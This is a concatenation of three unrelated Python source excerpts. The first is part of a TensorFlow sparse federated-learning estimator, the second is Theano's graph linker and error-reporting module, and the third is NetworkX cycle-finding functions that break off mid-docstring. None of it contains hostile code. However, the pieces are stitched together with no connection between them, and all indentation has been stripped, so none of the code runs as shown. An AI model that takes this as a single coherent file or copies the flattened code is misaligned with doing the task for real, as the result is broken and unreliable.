vec_config['initializers'] = [fs_map[i]._vec_initializer
for i in vec_config['weight_group_keys']]
vec_config['optimizers'] = [fs_map[i]._vec_optimizer
for i in vec_config['weight_group_keys']]
vec_config['use_fid_v2'] = self._use_fid_v2
return vec_config
def get_feature_columns(self):
return self._feature_column_v1s
def freeze_slots(self, features):
assert not self._frozen, "Already finalized"
if self._config_run:
raise ConfigRunError()
self._sparse_v2opt = {}
bias_config = self._get_bias_slot_configs()
if bias_config:
bias_weights = self._bias_embedding.weights
for i, opt in enumerate(bias_config['optimizers']):
for j in range(self._num_shards):
self._sparse_v2opt[bias_weights[i][j]] = opt
vec_config = self._get_vec_slot_configs()
if vec_config:
vec_weights = self._vec_embedding.weights
for i, opt in enumerate(vec_config['optimizers']):
for j in range(self._num_shards):
self._sparse_v2opt[vec_weights[i][j]] = opt
placeholders = []
dims = []
for slot_id, _, _, _ in vec_config['slot_list']:
fc = self._feature_column_v1s[slot_id]
for sslice in fc.feature_slot.feature_slices:
dims.append(sslice.len)
placeholders.append(fc.get_vector(sslice))
vec_split = tf.split(self._vec_tensor, dims, axis=1)
ge.swap_ts(vec_split, placeholders)
for slot in self._feature_slots.values():
slot._frozen = True
self._frozen = True
class SparseFLEstimator(estimator.FLEstimator):
def __init__(self,
cluster_server,
trainer_master,
bridge,
role,
model_fn,
is_chief=False):
super(SparseFLEstimator, self).__init__(
cluster_server, trainer_master, bridge, role, model_fn, is_chief)
self._bias_slot_configs = None
self._vec_slot_configs = None
self._slot_configs = None
try:
ps_indices = cluster_server.cluster_spec.task_indices('ps')
except ValueError:
ps_indices = None
finally:
self._embedding_devices = [None,] if not ps_indices else \
['/job:ps/task:%d'%i for i in ps_indices]
self._num_shards = len(self._embedding_devices)
def _preprocess_fids(self, fids, configs):
if fids.indices.shape.rank == 2:
fids = tf.IndexedSlices(indices=fids.indices[:, 0],
values=fids.values,
dense_shape=fids.dense_shape)
features = {}
for config in configs:
features.update(operator._multidevice_preprocess_fids(
fids, config, num_shards=self._num_shards))
return features
def _set_model_configs(self, mode): #features, labels, mode):
with tf.Graph().as_default() as g:
M = SparseFLModel(self._role,
self._bridge,
None, #features['example_id'],
config_run=True)
try:
self._model_fn(M, None, None, mode) # features, labels, mode)
except ConfigRunError as e:
self._bias_slot_configs = M._get_bias_slot_configs()
self._vec_slot_configs = M._get_vec_slot_configs()
self._feature_columns = M.get_feature_columns()
self._slot_configs = [self._bias_slot_configs,
self._vec_slot_configs]
return self._slot_configs
raise UserWarning("Failed to get model config. Did you forget to call \
freeze_slots in model_fn?")
def _get_features_and_labels_from_input_fn(self, input_fn, mode):
slot_configs = self._set_model_configs(mode) # features, labels, mode)
def input_fn_wrapper(*args, **kwargs):
dataset = input_fn(self._bridge, self._trainer_master)
def mapper(features, *args):
features.update(self._preprocess_fids(features.pop('fids'),
slot_configs))
return (features,) + args if args else features
dataset = dataset.map(
mapper, num_parallel_calls=tf.data.experimental.AUTOTUNE)
dataset = dataset.prefetch(2)
return dataset
return super(SparseFLEstimator, self
)._get_features_and_labels_from_input_fn(input_fn_wrapper, mode)
def _get_model_spec(self, features, labels, mode):
features = features.copy()
if mode == tf.estimator.ModeKeys.PREDICT:
fids = tf.IndexedSlices(
indices=features.pop('fids_indices'),
values=features.pop('fids_values'),
dense_shape=features.pop('fids_dense_shape'))
features.update(self._preprocess_fids(
fids, self._slot_configs))
bias_embedding = embedding.Embedding(self._bias_slot_configs,
devices=self._embedding_devices)
bias_tensor = bias_embedding.lookup(features)
if self._vec_slot_configs is not None:
vec_embedding = embedding.Embedding(self._vec_slot_configs,
devices=self._embedding_devices)
vec_tensor = vec_embedding.lookup(features)
else:
vec_embedding = None
vec_tensor = None
model = SparseFLModel(self._role, self._bridge,
features.get('example_id', None),
config_run=False,
bias_tensor=bias_tensor,
bias_embedding=bias_embedding,
vec_tensor=vec_tensor,
vec_embedding=vec_embedding,
feature_columns=self._feature_columns)
spec = self._model_fn(model, features, labels, mode)
assert model._frozen, "Please finalize model in model_fn"
return spec, model
|
|
"""WRITEME"""
from __future__ import print_function
from copy import copy, deepcopy
from sys import getsizeof
import sys
import traceback
import numpy
import theano
from theano.compat import izip
from six import reraise
from six.moves import StringIO
from theano.gof import utils
from theano.gof import graph
from theano.gof.type import Type
from .utils import undef
__excepthook = sys.excepthook
def log_thunk_trace(value, f=sys.stderr):
"""Log Theano's diagnostic stack trace for an exception
raised by raise_with_op.
"""
# in future, consider accepting `write` as arg rather than file
# to support writing to a logger
def write(msg):
print("log_thunk_trace: %s" % msg.strip(), file=f)
if hasattr(value, '__thunk_trace__'):
trace2 = value.__thunk_trace__
write("There was a problem executing an Op.")
if trace2 is None:
write("Could not find where this Op was defined.")
write(" * You might have instantiated this Op "
"directly instead of using a constructor.")
write(" * The Op you constructed might have been"
" optimized. Try turning off optimizations.")
elif trace2:
write("Definition in: ")
for line in traceback.format_list(trace2):
write(line)
write("For the full definition stack trace set"
" the Theano flags traceback.limit to -1")
def thunk_hook(type, value, trace):
"""WRITEME
This function is meant to replace excepthook and do some
special work if the exception value has a __thunk_trace__
field. In that case, it retrieves the field, which should
contain a trace as returned by L{traceback.extract_stack},
and prints it out on L{stderr}.
The normal excepthook is then called.
:note: This hook replaced by nosetests, so it does not run in nose tests.
"""
log_thunk_trace(value)
__excepthook(type, value, trace)
sys.excepthook = thunk_hook
# TODO: Make this work with linker defined schedule
def raise_with_op(node, thunk=None, exc_info=None, storage_map=None):
"""
Re-raise an exception while annotating the exception object with
debug info.
Parameters
----------
node : Apply node
The Apply node object that resulted in the raised exception.
exc_info : tuple, optional
A tuple containing the exception type, exception object and
associated traceback, as would be returned by a call to
`sys.exc_info()` (which is done if `None` is passed).
storage_map: dict, optional
storage map of the theano function that resulted in the
raised exception.
Notes
-----
This re-raises the exception described by `exc_info` (or the last
one raised, if `exc_info` is omitted) and annotates the exception
object with several new members which may be helpful for debugging
Theano graphs. They are:
* __op_instance__: The Op that is responsible for the exception
being raised.
* __thunk_trace__: A traceback corresponding to the code that
actually generated the exception, if it is available.
* __applynode_index__: The index of the Apply node corresponding
to this op in `op.fgraph.toposort()`.
The exception is not annotated if it is of type `KeyboardInterrupt`.
"""
if exc_info is None:
exc_info = sys.exc_info()
exc_type, exc_value, exc_trace = exc_info
if exc_type == KeyboardInterrupt:
# print a simple traceback from KeyboardInterrupt
reraise(exc_type, exc_value, exc_trace)
try:
trace = node.outputs[0].tag.trace
except AttributeError:
try:
trace = node.op.tag.trace
except AttributeError:
trace = ()
exc_value.__thunk_trace__ = trace
exc_value.__op_instance__ = node
topo = node.fgraph.toposort()
if node in topo:
node_index = topo.index(node)
else:
node_index = None
exc_value.__applynode_index__ = node_index
hints = []
detailed_err_msg = "\nApply node that caused the error: " + str(node)
if exc_value.__applynode_index__ is not None:
detailed_err_msg += "\nToposort index: %d" % node_index
types = [getattr(ipt, 'type', 'No type') for ipt in node.inputs]
detailed_err_msg += "\nInputs types: %s\n" % types
if thunk is not None:
if hasattr(thunk, 'inputs'):
shapes = [getattr(ipt[0], 'shape', 'No shapes')
for ipt in thunk.inputs]
strides = [getattr(ipt[0], 'strides', 'No strides')
for ipt in thunk.inputs]
scalar_values = []
for ipt in thunk.inputs:
if getattr(ipt[0], "size", -1) <= 5:
scalar_values.append(ipt[0])
else:
scalar_values.append("not shown")
else:
shapes = "The thunk don't have an inputs attributes."
strides = "So we can't access the strides of inputs values"
scalar_values = "And can't print its inputs scalar value"
clients = [[c[0] for c in var.clients] for var in node.outputs]
detailed_err_msg += ("Inputs shapes: %s" % shapes +
"\nInputs strides: %s" % strides +
"\nInputs values: %s" % scalar_values)
if hasattr(node.op, '__input_name__'):
detailed_err_msg += "\nInputs name: %s\n" % str(node.op.__input_name__)
detailed_err_msg += "\nOutputs clients: %s\n" % clients
else:
hints.append(
"HINT: Use another linker then the c linker to"
" have the inputs shapes and strides printed.")
# Print node backtraces
tr = getattr(node.outputs[0].tag, 'trace', [])
if len(tr) > 0:
detailed_err_msg += "\nBacktrace when the node is created:\n"
# Print separate message for each element in the list of batcktraces
sio = StringIO()
for subtr in tr:
traceback.print_list(subtr, sio)
detailed_err_msg += str(sio.getvalue())
else:
hints.append(
"HINT: Re-running with most Theano optimization disabled could"
" give you a back-trace of when this node was created. This can"
" be done with by setting the Theano flag"
" 'optimizer=fast_compile'. If that does not work,"
" Theano optimizations can be disabled with 'optimizer=None'.")
if theano.config.exception_verbosity == 'high':
f = StringIO()
theano.printing.debugprint(node, file=f, stop_on_name=True,
print_type=True)
detailed_err_msg += "\nDebugprint of the apply node: \n"
detailed_err_msg += f.getvalue()
# Prints output_map
if theano.config.exception_verbosity == 'high' and storage_map is not None:
detailed_err_msg += "\nStorage map footprint:\n"
shared_input_list = [
item for item in node.fgraph.inputs
if isinstance(item, theano.compile.SharedVariable)]
nonshared_input_list = [
item for item in node.fgraph.inputs
if not isinstance(item, theano.compile.SharedVariable)]
storage_map_list = []
total_size = 0
total_size_inputs = 0
for k in storage_map:
storage_map_item = []
# storage_map_item[0]: the variable
storage_map_item.append(str(k))
# storage_map_item[1]: the shape
shapeinfo = None
if hasattr(storage_map[k][0], 'shape'):
shapeinfo = storage_map[k][0].shape
if len(shapeinfo) != 0:
storage_map_item.append(shapeinfo)
else:
storage_map_item.append(tuple())
else:
storage_map_item.append(None)
# storage_map_item[2]: itemsize
# storage_map_item[3]: bytes
if hasattr(storage_map[k][0], 'dtype'):
dtype = storage_map[k][0].dtype
storage_map_item.append(numpy.dtype(dtype).itemsize)
if shapeinfo is None:
storage_map_item.append(None)
else:
sz = numpy.dtype(dtype).itemsize * numpy.prod(shapeinfo)
storage_map_item.append(sz)
total_size += sz
if not k.owner:
total_size_inputs += sz
else:
# If it is a view, don't count it twice.
if getattr(k.owner.op, 'view_map', None):
vmap = k.owner.op.view_map
out_idx = k.owner.outputs.index(k)
data = storage_map[k][0]
if out_idx in vmap:
assert len(vmap[out_idx]) == 1
input_data = storage_map[
k.owner.inputs[vmap[out_idx][0]]][0]
if k.type.may_share_memory(data, input_data):
total_size -= sz
# If it is a destroyed input, the input
# shouldn't be in the storage_map anymore
# except if there is a special flag used. So
# we still must check it.
if getattr(k.owner.op, 'destroy_map', None):
vmap = k.owner.op.destroy_map
out_idx = k.owner.outputs.index(k)
data = storage_map[k][0]
if out_idx in vmap:
assert len(vmap[out_idx]) == 1
input_data = storage_map[
k.owner.inputs[vmap[out_idx][0]]][0]
if k.type.may_share_memory(data, input_data):
total_size -= sz
else:
bytes = getsizeof(storage_map[k][0])
storage_map_item.append(bytes)
storage_map_item.append(None)
# Flag of shared val
# storage_map_item[4]
if k in shared_input_list:
storage_map_item.append(True)
elif k in nonshared_input_list:
storage_map_item.append(False)
else:
storage_map_item.append(None)
storage_map_list.append(storage_map_item)
from operator import itemgetter
storage_map_list.sort(key=itemgetter(3), reverse=True)
for item in storage_map_list:
if item[3] is None:
continue
detailed_err_msg += " - " + item[0] + ", "
if item[4] is True:
detailed_err_msg += "Shared Input, "
elif item[4] is False:
detailed_err_msg += "Input, "
if item[1] is not None:
detailed_err_msg += "Shape: %s, " % str(item[1])
detailed_err_msg += "ElemSize: %s Byte(s)" % item[2]
if item[3] is not None:
detailed_err_msg += ", TotalSize: %s Byte(s)\n" % item[3]
else:
detailed_err_msg += "\n"
detailed_err_msg += " TotalSize: %s Byte(s) %.3f GB\n" % (
total_size, total_size / 1024. / 1024 / 1024)
detailed_err_msg += " TotalSize inputs: %s Byte(s) %.3f BG\n" % (
total_size_inputs, total_size_inputs / 1024. / 1024 / 1024)
else:
hints.append(
"HINT: Use the Theano flag 'exception_verbosity=high'"
" for a debugprint and storage map footprint of this apply node.")
exc_value = exc_type(str(exc_value) + detailed_err_msg +
'\n' + '\n'.join(hints))
reraise(exc_type, exc_value, exc_trace)
class Linker(object):
"""WRITEME"""
def clone(self, allow_gc=undef):
new = copy(self)
if allow_gc is not undef:
new.allow_gc = allow_gc
return new
def make_thunk(self):
"""
This function must return a triplet (function, input_variables, output_variables)
where function is a thunk that operates on the returned variables. If inplace
is True, the input_variables and output_variables lists will be the same as the
inputs and outputs of the graph provided to the L{Linker}. Else, independent
variables will be returned.
Example::
x, y = Variable(Double), Variable(Double)
e = x + y
fgraph = FunctionGraph([x, y], [e])
fn, (new_x, new_y), (new_e, ) = MyLinker(fgraph).make_thunk(inplace)
new_x.data = 1.0
new_y.data = 2.0
fn()
print new_e.data # 3.0
print e.data # 3.0 iff inplace == True (else unknown)
"""
raise utils.MethodNotDefined("make_thunk", type(self),
self.__class__.__name__)
# DELETEME #
def make_function(self, unpack_single=True, **kwargs):
"""
Returns a function that takes values corresponding to the inputs of the
fgraph used by this L{Linker} and returns values corresponding the the outputs
of that fgraph. If inplace is True, the calculations will operate in the
same storage the fgraph uses, else independent storage will be allocated
for the function.
Example::
e = x + y
fgraph = FunctionGraph([x, y], [e])
fn = MyLinker(fgraph).make_function(inplace)
print fn(1.0, 2.0) # 3.0
print e.data # 3.0 iff inplace == True (else unknown)
If unpack_single is True (default) and that the function has only one
output, then that output will be returned. Else, a list or tuple of
length 1 will be returned.
"""
thunk, inputs, outputs = self.make_thunk(**kwargs)
def execute(*args):
def e_arity(takes, got):
return 'Function call takes exactly %i %s (%i given)' % (
takes, ['argument', 'arguments'][takes > 1], got)
if (len(args) != len(inputs)):
raise TypeError(e_arity(len(inputs), len(args)))
for arg, variable in izip(args, inputs):
variable.data = arg
thunk()
if unpack_single:
return utils.to_return_values([variable.data
for variable in outputs])
else:
return [variable.data for variable in outputs]
execute.thunk = thunk
execute.inputs = inputs
execute.outputs = outputs
return execute
def schedule(self, fgraph):
return fgraph.toposort()
# TODO: Move this class to the compile module, where it is used (and for which it exists).
class Container(object):
"""This class joins a variable with its computed value.
It is used in linkers, especially for the inputs and outputs of a Function.
"""
def __init__(self, r, storage, readonly=False, strict=False,
allow_downcast=None, name=None):
"""WRITEME
:Parameters:
`r`: a Variable or a Type
`storage`: a list of length 1, whose element is the value for `r`
`readonly`: True indicates that this should not be setable by Function[r] = val
`strict`: if True, we don't allow type casting.
`allow_downcast`: if True (and `strict` is False), allow upcasting
of type, but not downcasting. If False, prevent it. If None
(default), allows only downcasting of float to floatX scalar.
`name`: A string (for pretty-printing?)
"""
if not isinstance(storage, list) or not len(storage) >= 1:
raise TypeError("storage must be a list of length at least one")
# self.r = r
if isinstance(r, Type):
self.type = r
else:
self.type = r.type
if name is None:
# Some Type do not have a name field.
self.name = getattr(r, 'name', None)
else:
self.name = name
self.storage = storage
self.readonly = readonly
self.strict = strict
self.allow_downcast = allow_downcast
def __get__(self):
return self.storage[0]
def __set__(self, value):
if self.readonly:
raise Exception("Cannot set readonly storage: %s" % self.name)
try:
if value is None:
self.storage[0] = None
return
kwargs = {}
if self.strict:
kwargs['strict'] = True
if self.allow_downcast is not None:
kwargs['allow_downcast'] = self.allow_downcast
if hasattr(self.type, 'filter_inplace'):
self.storage[0] = self.type.filter_inplace(value,
self.storage[0],
**kwargs)
else:
self.storage[0] = self.type.filter(value, **kwargs)
except Exception as e:
e.args = e.args + (('Container name "%s"' % self.name),)
raise
data = property(__get__, __set__)
value = property(__get__, __set__)
def __str__(self):
return "<" + str(self.storage[0]) + ">"
def __repr__(self):
return "<" + repr(self.storage[0]) + ">"
def __deepcopy__(self, memo):
data_was_in_memo = id(self.storage[0]) in memo
r = type(self)(
deepcopy(self.type, memo=memo),
deepcopy(self.storage, memo=memo),
deepcopy(self.readonly, memo=memo),
deepcopy(self.strict, memo=memo),
deepcopy(self.allow_downcast, memo=memo),
deepcopy(self.name, memo=memo),
)
# Work around NumPy deepcopy of ndarray with 0 dimention that
# don't return an ndarray.
if (r.storage[0] is not None and
not self.type.is_valid_value(r.storage[0])):
assert not data_was_in_memo
assert self.type.is_valid_value(self.storage[0])
# This should also work for read only container.
r.storage[0] = self.type.filter(r.storage[0],
strict=False,
allow_downcast=False)
memo[id(self.storage[0])] = r.storage[0]
return r
def map_storage(fgraph, order, input_storage, output_storage):
"""Ensure there is storage (a length-1 list) for inputs, outputs, and interior nodes.
:param fgraph: The current fgraph. This function uses the inputs and outputs attributes.
:param order: an iterable over Apply instances (in program running order)
:param input_storage: None or existing input storage (see below)
:param output_storage: None or existing output storage (see below)
:rtype: 3-tuple
:returns: (list of storage for inputs, list of storage for outputs, and the `storage_map`)
This function iterates over the nodes in `order` and ensures that for every
input and output `Variable`, there is a unique storage container. This is
returned as a dictionary Variable->storage called the `storage_map`.
This function also returns `input_storage` which is a list of storages corresponding to fgraph.inputs.
This function also returns `output_storage` which is a list of storages corresponding to fgraph.outputs.
"""
# each Apply argument's data is stored in a list of length 1 (these lists act like pointers)
# input_storage is a list of data-containers for the inputs.
if input_storage is None:
input_storage = [[None] for input in fgraph.inputs]
else:
assert len(fgraph.inputs) == len(input_storage)
storage_map = {}
for r, storage in izip(fgraph.inputs, input_storage):
storage_map[r] = storage
# for orphan in fgraph.orphans:
# if not isinstance(orphan, Constant):
# raise TypeError("Cannot link a graph with non-constant orphans.", orphan)
# storage_map[orphan] = [orphan.data]
if output_storage is not None:
assert len(fgraph.outputs) == len(output_storage)
for r, storage in izip(fgraph.outputs, output_storage):
storage_map[r] = storage
for node in order:
for r in node.inputs:
if r not in storage_map:
assert isinstance(r, graph.Constant)
storage_map[r] = [r.data]
for r in node.outputs:
storage_map.setdefault(r, [None])
for r in fgraph.outputs:
if isinstance(r, graph.Constant):
storage_map.setdefault(r, [r.data])
if output_storage is None:
output_storage = [storage_map[r] for r in fgraph.outputs]
return input_storage, output_storage, storage_map
def streamline(fgraph, thunks, order, post_thunk_old_storage=None,
no_recycling=None, nice_errors=True):
"""WRITEME
:param fgraph:
:param thunks: the list of program instructions
:param order: the list of apply instances that gave rise to the thunks (same order as thunks)
:param post_thunk_old_storage: a list (corresponding to thunks, order) whose elements are
lists of storage cells, that should be cleared after running the corresponding thunk. A
value of None disables this functionality
:param no_recycling: storage elements that cannot be 'recycled' by repeatedly executing the
program. These storage elements are cleared before re-running.
:param nice_errors: run in such a way that the double-traceback is printed. This costs a
bit of performance in the inner python loop.
"""
if no_recycling is None:
no_recycling = []
if len(thunks) != len(order):
raise ValueError('Length of thunks and order must match',
(len(thunks), len(order)))
if post_thunk_old_storage:
if len(thunks) != len(post_thunk_old_storage):
raise ValueError(
'Length of thunks and post_thunk_old_storage must match',
(len(thunks), len(post_thunk_old_storage)))
def streamline_default_f():
for x in no_recycling:
x[0] = None
try:
for thunk, node, old_storage in izip(thunks, order,
post_thunk_old_storage):
thunk()
for old_s in old_storage:
old_s[0] = None
except Exception:
raise_with_op(node, thunk)
f = streamline_default_f
elif nice_errors:
def streamline_nice_errors_f():
for x in no_recycling:
x[0] = None
try:
for thunk, node in izip(thunks, order):
thunk()
except Exception:
raise_with_op(node, thunk)
f = streamline_nice_errors_f
else:
# don't worry about raise_with_op, just go a little faster.
# there is a mix of python and c thunks
def streamline_fast_f():
for x in no_recycling:
x[0] = None
for thunk in thunks:
thunk()
f = streamline_fast_f
return f
class LocalLinker(Linker):
"""WRITEME
Useful base class for L{Linker}s which keep all nodes in the graph, and run a
thunk associated with each node.
"""
def make_thunk(self, input_storage=None, output_storage=None):
return self.make_all(input_storage=input_storage,
output_storage=output_storage)[:3]
def make_all(self, input_storage, output_storage):
# By convention, subclasses of LocalLinker should implement this function!
#
# This function should return a tuple of 5 things
# 1. function to run the program
# 2. input storage
# 3. output storage
# 4. thunks: list of nodes' functions in the order they will be run by the function in (1)
# 5. order: list of nodes, in the order they will be run by the function in (1)
raise utils.MethodNotDefined("make_all", type(self),
self.__class__.__name__)
def gc_helper(node_list):
"""
:param node_list: list of Apply instances in program execution order
:rtype: a 2-tuple
:returns: FIRST, the set of Variable instances which are computed by node_list, and SECOND a
dictionary that maps each Variable instance to a the last node to use Variable as an input.
This is used to allow garbage collection within graphs.
It ignore view_map and destroy_map. This isn't needed as python
have referecence count. In Theano gc, we should not take into
account view_map and destroy_map as if the thunk decided to create
a new output, we would delay uselessly its gc by Python.
"""
# for freeing memory
last_user = {}
computed = set()
for node in node_list:
for input in node.inputs:
last_user[input] = node
for output in node.outputs:
computed.add(output)
return computed, last_user
class PerformLinker(LocalLinker):
"""WRITEME
Basic L{Linker} subclass that calls the perform method on each L{Op} in
the L{FunctionGraph} in the order given by L{Linker.schedule}.
"""
def __init__(self, allow_gc=None, schedule=None):
if allow_gc is None:
allow_gc = theano.config.allow_gc
self.fgraph = None
self.allow_gc = allow_gc
if schedule:
self.schedule = schedule
def accept(self, fgraph, no_recycling=None):
"""
:param fgraph: a PerformLinker can have accepted one FunctionGraph instance at a time.
:param no_recycling: WRITEME
:returns: self (TODO: WHY? Who calls this function?)
"""
if no_recycling is None:
no_recycling = []
if self.fgraph is not None and self.fgraph is not fgraph:
return type(self)(allow_gc=self.allow_gc).accept(fgraph, no_recycling)
# raise Exception("Cannot accept from a Linker that is already tied to another FunctionGraph.")
self.fgraph = fgraph
self.no_recycling = no_recycling
return self
def make_all(self, input_storage=None, output_storage=None):
"""
:param input_storage: WRITEME
:param output_storage: WRITEME
:returns: function to run all nodes, list of input containers, list of output containers, list of thunks (for all of program), list of nodes (for all of program)
"""
fgraph = self.fgraph
order = self.schedule(fgraph)
no_recycling = self.no_recycling
input_storage, output_storage, storage_map = map_storage(fgraph, order, input_storage, output_storage)
compute_map = {}
for k in storage_map:
compute_map[k] = [k.owner is None]
thunks = []
for node in order:
# Maker sure we don't use C version of the code, but rather only
# the python version
# Note : ops that implement their own make thunk don't usually
# have this attribute defiend !!
old_value = getattr(node.op, '_op_use_c_code', False)
try:
node.op._op_use_c_code = False
thunks += [node.op.make_thunk(node,
storage_map,
compute_map,
no_recycling)]
thunks[-1].inputs = [storage_map[v] for v in node.inputs]
thunks[-1].outputs = [storage_map[v] for v in node.outputs]
finally:
node.op._op_use_c_code = old_value
computed, last_user = gc_helper(order)
if self.allow_gc:
post_thunk_old_storage = []
else:
post_thunk_old_storage = None
for node in order:
if self.allow_gc:
post_thunk_old_storage.append(
[storage_map[input]
for input in node.inputs
if (input in computed) and (
input not in fgraph.outputs) and (
node == last_user[input])])
if no_recycling is True:
# True seems like some special code for *everything*?? -JB
# FunctionMaker always passes a list I think -JB
no_recycling = list(storage_map.values())
no_recycling = utils.difference(no_recycling, input_storage)
else:
no_recycling = [storage_map[r] for r in no_recycling if r not in fgraph.inputs]
# The function that actually runs your program is one of the f's in streamline.
f = streamline(fgraph, thunks, order, post_thunk_old_storage,
no_recycling=no_recycling)
f.allow_gc = self.allow_gc # HACK: this is a way of passing an arg to Function.__call__
add_clear_storage(f, computed, storage_map)
f.storage_map = storage_map
return (f,
[Container(input, storage)
for input, storage in izip(fgraph.inputs, input_storage)],
[Container(output, storage, True)
for output, storage in izip(fgraph.outputs, output_storage)],
thunks,
order)
def add_clear_storage(f, computed, storage_map):
def clear_storage():
for c in computed:
storage_map[c][0] = None
f.clear_storage = clear_storage
class WrapLinker(Linker):
"""
WRITEME
This class makes it easier to run several L{LocalLinker}s in parallel, and
offers some control over how each thunk is run.
A wrapper function must be provided, and it can be used to execute the
thunks, inspect the nodes, print stuff out, etc.
@note:
The outputs of the first linker will be returned.
@note:
This linker ensures that each linker has its own storage for
inputs and outputs and intermediate variables. There is no interference
between linkers.
"""
def __init__(self, linkers, wrapper):
"""
Initialize a WrapLinker.
@type linkers: list of L{LocalLinker} subclasses, whose make_all()
method returns thunks in the same order.
@param linkers: for each node in the graph, each linker will provide a
thunk. This class makes it possible to iterate over each linker's
program in parallel.
@type wrapper: lambda (i, i_node, i_thunk1, i_thunk2, ...) : None
@param wrapper: do some user-defined action for the i'th element of the
program. i_thunk<n> is the thunk returned by the n'th linker. (If you
want to run the program, make sure to call the necessary thunks in this
function.)
"""
self.fgraph = None
self.linkers = linkers
self.wrapper = wrapper
def __copy__(self):
"""
Shallow copy of a WrapLinker.
@returns: A copy of self, where each of the linkers in self.linkers
have been shallow-copied.
It is useful because in FunctionMaker, copy.copy is called on the
Mode's linker, so that it is not modified inplace when linker.accept()
is called. In this case, we want the wrapped linkers to be copied too.
"""
other = self.__class__(
linkers=[copy(l) for l in self.linkers],
wrapper=self.wrapper)
return other
def clone(self, allow_gc=undef):
return self.__class__(
linkers=[l.clone(allow_gc=allow_gc) for l in self.linkers],
wrapper=self.wrapper)
def accept(self, fgraph, no_recycling=None):
"""
@type fgraph: gof.FunctionGraph
@param fgraph: the fgraph which we will link
@type no_recycling: a list of Variables that belong to fgraph.
@param no_recycling: If a Variable is in no_recycling, L{WrapLinker} will clear
the output storage associated to it (for each linker in linkers) during
the computation to avoid reusing it.
"""
if no_recycling is None:
no_recycling = []
if self.fgraph is not None and self.fgraph is not fgraph:
return type(self)(self.linkers, self.wrapper).accept(fgraph,
no_recycling)
self.fgraph = fgraph
self.no_recycling = no_recycling
self.linkers = [linker.accept(fgraph, no_recycling)
for linker in self.linkers]
return self
def pre(self, f, inputs, order, thunk_groups):
pass
def make_thunk(self, **kwargs):
no_recycling = self.no_recycling
make_all = [self.linkers[0].make_all(**kwargs)]
kwargs.pop('input_storage', None)
make_all += [l.make_all(**kwargs) for l in self.linkers[1:]]
fns, input_lists, output_lists, thunk_lists, order_lists \
= zip(*make_all)
order_list0 = order_lists[0]
for order_list in order_lists[1:]:
if not order_list0 == order_list:
raise Exception(
"All linkers to WrapLinker should execute operations in the same order.")
inputs0 = input_lists[0]
outputs0 = output_lists[0]
thunk_groups = list(zip(*thunk_lists))
order = [x[0] for x in zip(*order_lists)]
to_reset = []
for thunks, node in izip(thunk_groups, order):
for j, output in enumerate(node.outputs):
if output in no_recycling:
for thunk in thunks:
to_reset.append(thunk.outputs[j])
wrapper = self.wrapper
pre = self.pre
def f():
for inputs in input_lists[1:]:
for input1, input2 in izip(inputs0, inputs):
input2.storage[0] = copy(input1.storage[0])
for x in to_reset:
x[0] = None
pre(self, [input.data for input in input_lists[0]],
order, thunk_groups)
for i, (thunks, node) in enumerate(izip(thunk_groups, order)):
try:
wrapper(i, node, *thunks)
except Exception:
raise_with_op(node, *thunks)
f.thunk_groups = thunk_groups
return f, inputs0, outputs0
def WrapLinkerMany(linkers, wrappers):
"""
Variant on WrapLinker that runs a series of wrapper functions instead of
just one.
"""
def wrapper(*args):
for f in wrappers:
f(*args)
return WrapLinker(linkers, wrapper)
|
|
"""
========================
Cycle finding algorithms
========================
"""
# Copyright (C) 2010-2012 by
# Aric Hagberg <[email protected]>
# Dan Schult <[email protected]>
# Pieter Swart <[email protected]>
# All rights reserved.
# BSD license.
import networkx as nx
from networkx.utils import *
from collections import defaultdict
__all__ = ['cycle_basis','simple_cycles','recursive_simple_cycles']
__author__ = "\n".join(['Jon Olav Vik <[email protected]>',
'Dan Schult <[email protected]>',
'Aric Hagberg <[email protected]>'])
@not_implemented_for('directed')
@not_implemented_for('multigraph')
def cycle_basis(G,root=None):
""" Returns a list of cycles which form a basis for cycles of G.
A basis for cycles of a network is a minimal collection of
cycles such that any cycle in the network can be written
as a sum of cycles in the basis. Here summation of cycles
is defined as "exclusive or" of the edges. Cycle bases are
useful, e.g. when deriving equations for electric circuits
using Kirchhoff's Laws.
Parameters
----------
G : NetworkX Graph
root : node, optional
Specify starting node for basis.
Returns
-------
A list of cycle lists. Each cycle list is a list of nodes
which forms a cycle (loop) in G.
Examples
--------
>>> G=nx.Graph()
>>> G.add_cycle([0,1,2,3])
>>> G.add_cycle([0,3,4,5])
>>> print(nx.cycle_basis(G,0))
[[3, 4, 5, 0], [1, 2, 3, 0]]
Notes
-----
This is adapted from algorithm CACM 491 [1]_.
References
----------
.. [1] Paton, K. An algorithm for finding a fundamental set of
cycles of a graph. Comm. ACM 12, 9 (Sept 1969), 514-518.
See Also
--------
simple_cycles
"""
gnodes=set(G.nodes())
cycles=[]
while gnodes: # loop over connected components
if root is None:
root=gnodes.pop()
stack=[root]
pred={root:root}
used={root:set()}
while stack: # walk the spanning tree finding cycles
z=stack.pop() # use last-in so cycles easier to find
zused=used[z]
for nbr in G[z]:
if nbr not in used: # new node
pred[nbr]=z
stack.append(nbr)
used[nbr]=set([z])
elif nbr == z: # self loops
cycles.append([z])
elif nbr not in zused:# found a cycle
pn=used[nbr]
cycle=[nbr,z]
p=pred[z]
while p not in pn:
cycle.append(p)
p=pred[p]
cycle.append(p)
cycles.append(cycle)
used[nbr].add(z)
gnodes-=set(pred)
root=None
return cycles
@not_implemented_for('undirected')
def simple_cycles(G):
"""Find simple cycles (elementary circuits) of a directed graph.
An simple cycle, or elementary circuit, is a closed path where no
node appears twice, except that the first and last node are the same.
Two elementary circuits are distinct if they are not cyclic permutations
of each other.
This is a nonrecursive, iterator/generator version of Johnson's
algorithm [1]_. There may be better algorithms for some cases [2]_ [3]_.
Parameters
----------
G : NetworkX DiGraph
A directed graph
Returns
-------
cycle_generator: generator
A generator that produces elementary cycles of the graph. Each cycle is
a list of nodes with the first and last nodes being the same.
Examples
--------
>>> G = nx.DiGraph([(0, 0), (0, 1), (0, 2), (1, 2), (2, 0), (2, 1), (2, 2)])
>>> list(nx.simple_cycles(G))
[[2], [2, 1], [2, 0], [2, 0, 1], [0]]
Notes
-----
The implementation follows pp. 79-80 in [1]_.
The time complexity is O((n+e)(c+1)) for n nodes, e edges and c
elementary circuits.
To filter the cycles so that they don't include certain nodes or edges,
copy your graph and eliminate those nodes or edges before calling.
>>> copyG = G.copy()
>>> copyG.remove_nodes_from([1])
>>> copyG.remove_edges_from([(0,1)])
>>> list(nx.simple_cycles(copyG))
[[2], [2, 0], [0]]
References
----------
.. [1] Finding all the elementary circuits of a directed graph.
D. B. Johnson, SIAM Journal on Computing 4, no. 1, 77-84, 1975.
http://dx.doi.org/10.1137/0204007
